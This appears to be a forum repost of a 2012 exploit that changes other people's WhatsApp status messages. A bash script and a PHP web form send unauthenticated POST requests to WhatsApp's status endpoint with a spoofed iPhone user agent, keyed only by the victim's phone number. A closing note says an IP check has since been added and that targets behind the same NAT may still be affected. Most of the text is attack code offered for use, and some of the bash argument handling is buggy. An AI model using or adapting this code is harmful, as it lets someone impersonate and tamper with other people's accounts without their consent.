WhatsApp Status Changer v0.2 Exploit

Código

#!/bin/bash
#
# WhatsApp Status changer v0.2 stable
# A slim exploit able to change the WhatsApp
# user status in a remote way.
#
# This program is released under the terms of the GNU General Public License
# (GPL), which is distributed with this software in the file "COPYING".
# The GPL specifies the terms under which users may copy and use this software.
#
 
show_help(){
  echo ""
  echo " 2012 (C) WhatsApp-exp.sh - The Whats App Status Changer Exploit"
  echo ""
  echo " --usage    show the exploit Usage"
  echo " --credits  show the exploit Credits"
  echo " --help     show the Help"
  echo ""
  echo " enJoy"
}
 
show_credits(){
  echo ""
  echo " Emanuele Gentili"
  echo " http://www.emanuelegentili.eu"
  echo " eg @ offensive-security.it"
  echo ""
  echo " Stefano Fratepietro"
  echo " http://steve.deftlinux.net"
  echo " stefano @ deftlinux.net"
  echo ""
 
}
 
show_usage(){
  echo ""
  echo " 2012 (C) WhatsApp-exp.sh - The Whats App Status Changer Exploit"
  echo ""
  echo " usage $0 --countrycode 39 --mobilenum 3931212343 --text g0t p0wned"
  echo ""
  echo " enJoy"
}
 
 
# Bash
while [[ $# != 0 ]]; do
    arg_name=$1; shift
    case "$arg_name" in
      --help|-?|-h) show_help; exit 0;;
      --credits) show_credits; exit 0;;
      --usage) show_usage; exit 0;;
      --countrycode) countrycode=$1; shift;;
      --mobilenum) mobilenum=$2; shift;;
      --text) text=$3; shift;;
      *) echo "invalid option: $1"; show_help;exit 1;;
    esac
done
 
[ -z "$countrycode" ] && { show_help; exit 1; }
 
whatsAppagent="WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/Unknown_(iPhone4,1)"
 
wget --no-cache --delete-after --quiet --no-check-certificate --user-agent="$whatsAppagent" --post-data="cc=$countrycode&me=$mobilenum&s=$text" https://s.whatsapp.net/client/iphone/u.php
 
echo ""
echo "[+] Operazione completata."
echo ""

http://www.exploit-db.com/exploits/18396/

PHP

Código

<form method="post">
 
    <dl>
        <dt>Country code: (example: 31)</dt>
        <dd><input type="text" name="cc" value="31" /></dd>
        <dt>Phonenumber: (example: +31612345678)</dt>
        <dd><input type="text" name="n" value="+316" /></dd>
        <dt>New status:</dt>
        <dd><input type="text" name="m" /></dd>
        <dd><input type="submit" value="Change!" /></dd>
    </dl>
 
</form>
 
<?php
ini_set('display_errors',0);
error_reporting(E_ALL|E_STRICT);
 
if ( $_SERVER['REQUEST_METHOD'] === 'POST' ) 
{
    $url = 'https://s.whatsapp.net/client/iphone/u.php';
    $fields = array(
        'cc' => urlencode($_POST['cc']),
        'me' => urlencode($_POST['n']),
        's'  => urlencode(stripslashes(utf8_decode($_POST['m'])))
    );
 
    //url-ify the data for the POST
    foreach ($fields as $key=>$value) {
        $fields_string .= $key . '=' . $value . '&';
    }
    rtrim($fields_string, '&');
 
    //open connection
    $ch = curl_init();
 
    //set the url, number of POST vars, POST data
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, count($fields));
    curl_setopt($ch, CURLOPT_POSTFIELDS, $fields_string);
    curl_setopt($ch, CURLOPT_USERAGENT, "WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/Unknown_(iPhone4,1)");
 
    //execute post
    $result = curl_exec($ch);
 
    //close connection
    curl_close($ch);
 
}
?>

Ya no funciona:

WhatsApp implemented an IP check – so this doesn’t work as well as it used to. The check entails checking if the update-request is for a WhatsApp account currently signed in, and checks if it is coming from the same IP as the target client is using. This means above could should still work for target WhatsApp users behind the same NAT (for example).

http://whatsappfail.net/index.php?option=com_content&view=article&id=2&catid=9&Itemid=121

http://www.wiretrip.org/2012/01/12/how-whatsappstatus-net-works/